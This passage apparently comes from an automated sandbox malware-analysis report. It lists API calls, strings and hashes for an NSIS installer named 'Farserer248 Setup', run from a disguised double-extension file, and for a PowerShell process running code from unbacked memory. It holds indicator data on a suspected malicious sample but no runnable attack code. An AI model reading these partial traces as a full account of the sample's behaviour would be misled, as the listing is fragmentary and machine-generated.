Opcode ID: c2503bfcf2246e62ed797cded5ab6927b78745c5d9db6101b08a72cb335ee43e
Instruction ID: 91dfb3b0b056daf98b78911dcd669c44197b27d39ed9af1c1c2aeb05edbb2529
Opcode Fuzzy Hash: c2503bfcf2246e62ed797cded5ab6927b78745c5d9db6101b08a72cb335ee43e
Instruction Fuzzy Hash: B931E971508351ABD310AF65CE48E1FBBE8AF89764F114A3EF591772D2C77888018B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00405595 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 90stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(Farserer248 Setup: Completed,%u.%u%s%s,?,00000000,00000000,?,000000DC,00000000,?,000000DF,Farserer248 Setup: Completed,?,?,?,?,?), ref: 00405654
wsprintfW.USER32 ref: 00405661
SetDlgItemTextW.USER32(?,Farserer248 Setup: Completed), ref: 00405678

Strings

%u.%u%s%s, xrefs: 0040564E
Farserer248 Setup: Completed, xrefs: 00405628, 0040562D, 00405653, 0040566A

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$Farserer248 Setup: Completed
API String ID: 3540041739-3134186179
Opcode ID: a871fa2658700926a744169ee9911511d456feaa1e54f378fbe5ab65636dddd5
Instruction ID: 46f03c1795ddbbdfa5c7e87a6366e106080ff7080865a6880c384701b222c305
Opcode Fuzzy Hash: a871fa2658700926a744169ee9911511d456feaa1e54f378fbe5ab65636dddd5
Instruction Fuzzy Hash: 94212B737406281BD7206A79DC40FAB729DC7C5364F01473EFD6AE31D2E9795C0985A4

Uniqueness

Uniqueness Score: -1.00%

Function 00401EEA Relevance: 7.6, APIs: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401F03
GetClientRect.USER32(00000000,?), ref: 00401F4D
LoadImageW.USER32(00000000,?,00000100,?,?,00000100), ref: 00401F82
SendMessageW.USER32(00000000,00000172,00000100,00000000), ref: 00401F92
DeleteObject.GDI32(00000000), ref: 00401FA1

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 1dc3abfa3c8bd2d0fa2c7d8d2b6549ab0233f6e4d05a49e404285e0ad6d5b50a
Instruction ID: e27ace6e12ae90fa735555d6dc2d141173546c7912e56d7ac4aa5ef0030ce692
Opcode Fuzzy Hash: 1dc3abfa3c8bd2d0fa2c7d8d2b6549ab0233f6e4d05a49e404285e0ad6d5b50a
Instruction Fuzzy Hash: 8721B372609705AFD350DF64DD84A6BB7E8FB88304F00083EF985E62A1D678D940CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401FB8 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00401FB9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401FD0
MulDiv.KERNEL32(00000000,00000000), ref: 00401FD8
ReleaseDC.USER32(?,00000000), ref: 00401FEB

Part of subcall function 00405ECE: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004060A0

CreateFontIndirectW.GDI32(0040C8E8), ref: 00402037

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcat
String ID:
API String ID: 4253744674-0
Opcode ID: 3e53c2dc1050926ecddd57de6b9722459353507f6a19a950f3088775d819a189
Instruction ID: b9d691f681b1209937415237e158f82981d667971e10985866f86d4da9f8ae91
Opcode Fuzzy Hash: 3e53c2dc1050926ecddd57de6b9722459353507f6a19a950f3088775d819a189
Instruction Fuzzy Hash: 3001B172104740EFD300AB749E4AE5A3BE8E755306F10892DF290B31E2CA7841069B2D

Uniqueness

Uniqueness Score: -1.00%

Function 0040657C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403CF8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A3), ref: 00406582
CharPrevW.USER32(?,00000000), ref: 0040658D
lstrcatW.KERNEL32(?,004082A8), ref: 0040659F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040657C

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: d3cf7004e435c36ab44b56149a026626ec0df863219ce38a9b644069ae6b90ca
Instruction ID: c70d21cecc90bb8b859ff1a399ae67dc7ca02465e5b17997a14524cccba5a45a
Opcode Fuzzy Hash: d3cf7004e435c36ab44b56149a026626ec0df863219ce38a9b644069ae6b90ca
Instruction Fuzzy Hash: 0DD01731102A24AFC6015B64EE08C9B76ACAF46302301407AF581A2160DB78599287A9

Uniqueness

Uniqueness Score: -1.00%

Function 00403364 Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00403554), ref: 00403375
GetTickCount.KERNEL32 ref: 00403394
CreateDialogParamW.USER32(0000006F,00000000,0040362A,00000000), ref: 004033B3
ShowWindow.USER32(00000000,00000005), ref: 004033C1

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 284262d1a68705dea0d7dc2966b5c0e2100ba3629a8de97cb486b6d4ccf5c3b8
Instruction ID: 66dc5bf47515c838dad350c81a9aedad462c555d1205ded2f3f13c6125eef8d2
Opcode Fuzzy Hash: 284262d1a68705dea0d7dc2966b5c0e2100ba3629a8de97cb486b6d4ccf5c3b8
Instruction Fuzzy Hash: 1CF0F870642301EBEB60AF60EE8DB1A3BA8B740B07F50557DA545B61E0DFB88540CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040665E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406B40: lstrcpynW.KERNEL32(?,?,00000400,0040384C,00428520,NSIS Error), ref: 00406B4D

Part of subcall function 00406BEB: CharNextW.USER32(?,?,?,00000000,00425268,00406675,00425268,00425268,00000000,?,?,00406761,?,00000000,74DF3420,?), ref: 00406BFA
Part of subcall function 00406BEB: CharNextW.USER32(00000000), ref: 00406BFF
Part of subcall function 00406BEB: CharNextW.USER32(00000000), ref: 00406C19

Part of subcall function 00406D63: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,00403CE6,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A3), ref: 00406DD8
Part of subcall function 00406D63: CharNextW.USER32(?,?,?,00000000), ref: 00406DE7
Part of subcall function 00406D63: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,00403CE6,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A3), ref: 00406DEC
Part of subcall function 00406D63: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,00403CE6,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A3), ref: 00406E04

lstrlenW.KERNEL32(00425268,00000000,00425268,00425268,00000000,?,?,00406761,?,00000000,74DF3420,?), ref: 004066B2
GetFileAttributesW.KERNEL32(00425268,00425268), ref: 004066C3

Part of subcall function 004065F5: FindFirstFileW.KERNELBASE(00000000,00426E68,00000000,004066A2,00425268), ref: 00406600
Part of subcall function 004065F5: FindClose.KERNEL32(00000000), ref: 0040660C

Strings

hRB, xrefs: 00406664

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: Char$Next$FileFind$AttributesCloseFirstPrevlstrcpynlstrlen
String ID: hRB
API String ID: 1879705256-2849660128
Opcode ID: 332689946265423fd645ed9ab5face97fdbee55fffef99fa94ae17f023b56c1f
Instruction ID: beafc536108d7ba01e664b685ecdf4e5eccfaf17ad61deadd737acf53e34c435
Opcode Fuzzy Hash: 332689946265423fd645ed9ab5face97fdbee55fffef99fa94ae17f023b56c1f
Instruction Fuzzy Hash: 2EF0A46290477066C63127355D84A2B795C8E0636970B0E3BFC93F12D2CA3ECC72897D

Uniqueness

Uniqueness Score: -1.00%

Function 00405905 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405939
CallWindowProcW.USER32(?,?,?,?), ref: 00405981

Part of subcall function 0040551D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040552F

Strings

, xrefs: 0040591A

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: f7564aae8f1926e4a3233c1544f36dde51f1e94d371324f1fe4a4fa4b0ae707c
Instruction ID: 29a3bf4303537c6dfb6488f9ea023ced7caa8441eed739618a1cdeace3b5dff5
Opcode Fuzzy Hash: f7564aae8f1926e4a3233c1544f36dde51f1e94d371324f1fe4a4fa4b0ae707c
Instruction Fuzzy Hash: F0017C72600508EBDF305F61EC01B9F3A2AEB40761F044437F904B62A0C7798A92AE9D

Uniqueness

Uniqueness Score: -1.00%

Function 00406235 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 00406241
PeekMessageW.USER32(?,00000000,?,T5@,00000001), ref: 00406255

Strings

T5@, xrefs: 00406249

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: Message$DispatchPeek
String ID: T5@
API String ID: 1770753511-1075436632
Opcode ID: d8a62fb761212d4ceaa778e85a53d914b0e66df5685006e9fc385d1597838791
Instruction ID: eed1a5b9d53383bb29fc144dd317486da41a8546b04d390c9037c82cb54063a4
Opcode Fuzzy Hash: d8a62fb761212d4ceaa778e85a53d914b0e66df5685006e9fc385d1597838791
Instruction Fuzzy Hash: C3D0127190020DB7DF10AFA4CD09F9A7B6CAF04744F00802ABB41A5090D778D1268769

Uniqueness

Uniqueness Score: -1.00%

Function 00406D36 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403433,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe,C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe,80000000,00000003,?,?,?,?,?), ref: 00406D3C
CharPrevW.USER32(80000000,00000000,?,?,?,?,?), ref: 00406D4D

Strings

C:\Users\user\Desktop, xrefs: 00406D36

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: f3194ec8bfc8aa9af91b6cc67001010a6a2c3316178bb9d23f4bbec53c2e5c5b
Instruction ID: a73699a822f17830b99b7c1a49ea22a968a2329701a94a52d4a84ec236d7b83d
Opcode Fuzzy Hash: f3194ec8bfc8aa9af91b6cc67001010a6a2c3316178bb9d23f4bbec53c2e5c5b
Instruction Fuzzy Hash: 78D05E72105520DBC7526B28ED05CAF77BCEF0530034A846AE582E7274CB385C9187BD

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 6636, Parent PID: 6544COMMON

Executed Functions

Function 074EBB58 Relevance: 21.7, Strings: 16, Instructions: 1706COMMON

Download Yara Rule

Strings

x.rk, xrefs: 074EC6BF
x.rk, xrefs: 074ED3B1
4'^q, xrefs: 074EC3B8
4~l, xrefs: 074ECCD0
-rk, xrefs: 074EBAC1
4'^q, xrefs: 074ECE7D
tLsk, xrefs: 074ECDF6
4'^q, xrefs: 074EB79C
tLsk, xrefs: 074EBC12
4'^q, xrefs: 074EC3C4
x.rk, xrefs: 074EBA73
tLsk, xrefs: 074EBB85
tLsk, xrefs: 074EB573
4'^q, xrefs: 074EB840
-rk, xrefs: 074EC710
4~l, xrefs: 074ECCE6

Memory Dump Source

Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4~l$4~l$tLsk$tLsk$tLsk$tLsk$x.rk$x.rk$x.rk$-rk$-rk
API String ID: 0-2129042929
Opcode ID: 39277e46ee572f478b6fb3605b75a64fb7f09e0767405b149beeba722057c218
Instruction ID: e3e1d9675067b06f09f8c07d76f39b9992e4bd7b99e546188cd3a0f22adca85e
Opcode Fuzzy Hash: 39277e46ee572f478b6fb3605b75a64fb7f09e0767405b149beeba722057c218
Instruction Fuzzy Hash: D8F24EB4A00219DFCB24DB24CA50BDABBB6BF85314F1188A9D509AF751CB31ED85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0462F000 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

\V%k, xrefs: 0462F2B7

Memory Dump Source

Source File: 00000001.00000002.2186473863.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4620000_powershell.jbxd

Similarity

API ID:
String ID: \V%k
API String ID: 0-4198323507
Opcode ID: 2ae6d9fdfd4c50faf993d11ec27e83866999d577c8313e3b5c88da7a8090cdce
Instruction ID: aa449a551cc946e75a97d7a930830611d6d41f2ce95241589976a6069958bd05
Opcode Fuzzy Hash: 2ae6d9fdfd4c50faf993d11ec27e83866999d577c8313e3b5c88da7a8090cdce
Instruction Fuzzy Hash: 2BB18C70E00619EFDB18CFA9DA9579EBBF2AF88304F148529D814A7354FB34A845DF81

Uniqueness

Uniqueness Score: -1.00%

Function 0462F8D0 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2186473863.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e351e9b18bf0d043b2b91cbfde96ce69f7d6e4a8d5bcba3617272a1e3b6b28c1
Instruction ID: cae928674c9d32ad353bd9d2b7da3abd654c470322ca77adb6b2b31ab187e09f
Opcode Fuzzy Hash: e351e9b18bf0d043b2b91cbfde96ce69f7d6e4a8d5bcba3617272a1e3b6b28c1
Instruction Fuzzy Hash: 5FB1AF70E00629EFDB18CFA8DA9179EBBF2AF48314F148529D805A7354FB34A845DF81

Uniqueness

Uniqueness Score: -1.00%

Function 04627801 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2186473863.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90b4a52b518da45f732c99797f03ce82ad99b08e5cce7913d9fec205fc35463e
Instruction ID: 98776087a4273a5da59a620a6050916e2141c948e4df3b5b3e00e95d17d3b5a7
Opcode Fuzzy Hash: 90b4a52b518da45f732c99797f03ce82ad99b08e5cce7913d9fec205fc35463e
Instruction Fuzzy Hash: AE41B235B40614AFDB19EF34C554AAABBF2EF8D351F084469D502EB3A0DB35AC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 074E2D70 Relevance: 21.4, Strings: 16, Instructions: 1393COMMON

Download Yara Rule

Strings

x.rk, xrefs: 074E49D4
4'^q, xrefs: 074E3219
tP^q, xrefs: 074E33A4
tP^q, xrefs: 074E2EA2
4'^q, xrefs: 074E3CAD
-rk, xrefs: 074E4A19
4'^q, xrefs: 074E4988
4'^q, xrefs: 074E3CB9
tP^q, xrefs: 074E33B0
4'^q, xrefs: 074E4994
x.rk, xrefs: 074E3FF1
4'^q, xrefs: 074E4909
4'^q, xrefs: 074E4915
-rk, xrefs: 074E403F
4'^q, xrefs: 074E3225
tP^q, xrefs: 074E2EAE

Memory Dump Source

Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$tP^q$tP^q$x.rk$x.rk$-rk$-rk
API String ID: 0-4028008535
Opcode ID: 7777f0334705b6755ae49de580c94b8ada4a902d68a5f4b5638983166990e097
Instruction ID: 484fb5a6ff7f286ecdbca1842154a84f543a1325bb7c1f5b00949c7797aa6541
Opcode Fuzzy Hash: 7777f0334705b6755ae49de580c94b8ada4a902d68a5f4b5638983166990e097
Instruction Fuzzy Hash: 97C2D4B0A00215DFC724DF68C940BABBBF6AF85311F1488AAD419AF791CB31ED45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 074EC7A9 Relevance: 12.3, Strings: 9, Instructions: 1096COMMON

Download Yara Rule

Strings

x.rk, xrefs: 074EBA73
x.rk, xrefs: 074EC6BF
4'^q, xrefs: 074EC3B8
tLsk, xrefs: 074EB573
tLsk, xrefs: 074ECB69
-rk, xrefs: 074EBAC1
4'^q, xrefs: 074EB840
-rk, xrefs: 074EC710
4'^q, xrefs: 074EB79C

Memory Dump Source

Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$tLsk$tLsk$x.rk$x.rk$-rk$-rk
API String ID: 0-2096596190
Opcode ID: 0d162c03e6317add500400003a9adc25c7d0d5ff369da200013fd4db243b3e5e
Instruction ID: 1c0916ec0d55515c05b27ec464bdf29d34ae4036fae1e2b27adfd1aa5d57d904
Opcode Fuzzy Hash: 0d162c03e6317add500400003a9adc25c7d0d5ff369da200013fd4db243b3e5e
Instruction Fuzzy Hash: DEB251B4A00215DFCB24DB64CA50BDABBB2FF89304F1089A9D5496F791CB32AD85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0462B910 Relevance: 10.5, Strings: 8, Instructions: 519COMMON

Download Yara Rule

Strings

h]%k, xrefs: 0462BB3A
Hbq, xrefs: 0462B9D6
h]%k, xrefs: 0462C4A0
$^q, xrefs: 0462BB2A
8N%k, xrefs: 0462CA00
h]%k, xrefs: 0462BFDE
$^q, xrefs: 0462BE8F
I%k, xrefs: 0462C4CC

Memory Dump Source

